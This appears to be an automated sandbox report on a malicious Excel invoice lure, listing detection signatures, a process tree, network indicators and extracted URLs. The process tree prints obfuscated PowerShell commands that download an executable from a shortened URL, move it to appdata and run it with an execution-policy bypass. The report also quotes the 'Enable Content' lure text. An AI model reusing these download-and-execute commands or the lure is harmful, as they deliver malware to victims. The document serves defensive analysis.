Loading ...

Play interactive tourEdit tour

Analysis Report Proforma Invoice.xls

Overview

General Information

Sample Name:Proforma Invoice.xls
Analysis ID:320373
MD5:55db711144ff4a35faf58d982e7cf727
SHA1:ea7b59dde9f0600915069dec66f8410f25cb66fd
SHA256:6e76bd502c91158631cadf485ce44caa4d6504864735593fc23d90477a794d17
Tags:netwirexls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Bypasses PowerShell execution policy
Document contains an embedded VBA macro which may execute processes
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Obfuscated command line found
Sigma detected: Microsoft Office Product Spawning Windows Shell
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 5944 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • cmd.exe (PID: 4952 cmdline: cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe') MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 3060 cmdline: powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe') MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • cmd.exe (PID: 488 cmdline: cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 4804 cmdline: powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • cmd.exe (PID: 5608 cmdline: cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6196 cmdline: powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe'), CommandLine: cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe'), CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5944, ProcessCommandLine: cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe'), ProcessId: 4952

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: https://shopphongtinh.com/Ubnccbruoun7.exeAvira URL Cloud: Label: malware
Multi AV Scanner detection for submitted fileShow sources
Source: Proforma Invoice.xlsVirustotal: Detection: 14%Perma Link
Source: Proforma Invoice.xlsReversingLabs: Detection: 20%

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe
Source: global trafficDNS query: name: cutt.ly
Source: global trafficTCP traffic: 192.168.2.3:49731 -> 104.22.1.232:443
Source: global trafficTCP traffic: 192.168.2.3:49731 -> 104.22.1.232:443
Source: Joe Sandbox ViewIP Address: 202.92.6.10 202.92.6.10
Source: Joe Sandbox ViewIP Address: 104.22.1.232 104.22.1.232
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknownDNS traffic detected: queries for: cutt.ly
Source: powershell.exe, 00000006.00000003.376603901.0000000007567000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.rapidssl.com/RapidSSLTLSRSACAG1.crt0
Source: powershell.exe, 00000006.00000003.376603901.0000000007567000.00000004.00000001.sdmpString found in binary or memory: http://cdp.rapidssl.com/RapidSSLTLSRSACAG1.crl0L
Source: powershell.exe, 00000009.00000002.441145134.0000000000F96000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000009.00000003.417560571.0000000007EA2000.00000004.00000001.sdmpString found in binary or memory: http://crl.m
Source: powershell.exe, 00000009.00000003.430528579.00000000095CD000.00000004.00000001.sdmpString found in binary or memory: http://crl.micro
Source: powershell.exe, 00000006.00000003.274685863.0000000007514000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsof
Source: powershell.exe, 00000008.00000003.380298000.0000000008CAD000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsoft.co
Source: powershell.exe, 00000006.00000003.376603901.0000000007567000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0c
Source: powershell.exe, 00000006.00000003.376603901.0000000007567000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0B
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: powershell.exe, 00000008.00000002.411829647.0000000004863000.00000004.00000001.sdmp, powershell.exe, 00000009.00000003.383638755.0000000007DB1000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.385123620.0000000004721000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.411599928.0000000004721000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000003.376603901.0000000007567000.00000004.00000001.sdmpString found in binary or memory: http://status.rapidssl.com0
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: powershell.exe, 00000008.00000002.411829647.0000000004863000.00000004.00000001.sdmp, powershell.exe, 00000009.00000003.383638755.0000000007DB1000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://api.aadrm.com/
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://api.office.net
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://api.onedrive.com
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://augloop.office.com
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://autodiscover-s.outlook.com
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://cdn.entity.
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://clients.config.office.net/
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://config.edge.skype.com
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://cortana.ai
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://cr.office.com
Source: powershell.exe, 00000006.00000003.376490691.0000000008D79000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.385597645.0000000004863000.00000004.00000001.sdmpString found in binary or memory: https://cutt.ly
Source: PowerShell_transcript.581804.sxhBoU5o.20201119100421.txt.6.drString found in binary or memory: https://cutt.ly/ZhqUH1O
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://devnull.onenote.com
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://directory.services.
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: powershell.exe, 00000008.00000002.411829647.0000000004863000.00000004.00000001.sdmp, powershell.exe, 00000009.00000003.383638755.0000000007DB1000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://graph.windows.net
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://graph.windows.net/
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://lifecycle.office.com
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://login.windows.local
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://management.azure.com
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://management.azure.com/
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://messaging.office.com/
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://ncus-000.contentsync.
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://officeapps.live.com
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://onedrive.live.com
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://outlook.office.com
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://outlook.office365.com
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: powershell.exe, 00000006.00000002.386239949.0000000004983000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.386277042.0000000004987000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://settings.outlook.com
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: powershell.exe, 00000006.00000002.386239949.0000000004983000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.386277042.0000000004987000.00000004.00000001.sdmpString found in binary or memory: https://shopphongtinh.com/Ubnccbruoun7.exe
Source: powershell.exe, 00000006.00000002.386277042.0000000004987000.00000004.00000001.sdmpString found in binary or memory: https://shopphongtinh.com4
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://tasks.office.com
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://wus2-000.contentsync.
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: powershell.exe, 00000006.00000003.376603901.0000000007567000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: powershell.exe, 00000006.00000002.386239949.0000000004983000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-112763434-1
Source: 858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Document image extraction number: 0Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 0Screenshot OCR: Enable Content"
Source: Document image extraction number: 1Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 1Screenshot OCR: Enable Content"
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function auto_open, API Run("Auto_ouvrir51")
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Proforma Invoice.xlsInitial sample: EXEC
Found obfuscated Excel 4.0 MacroShow sources
Source: Proforma Invoice.xlsInitial sample: High usage of CHAR() function: 37
Source: Proforma Invoice.xlsOLE, VBA macro line: Sub auto_open()
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function auto_open
Source: Proforma Invoice.xlsOLE indicator, VBA macros: true
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
Source: classification engineClassification label: mal92.expl.evad.winXLS@16/20@2/2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
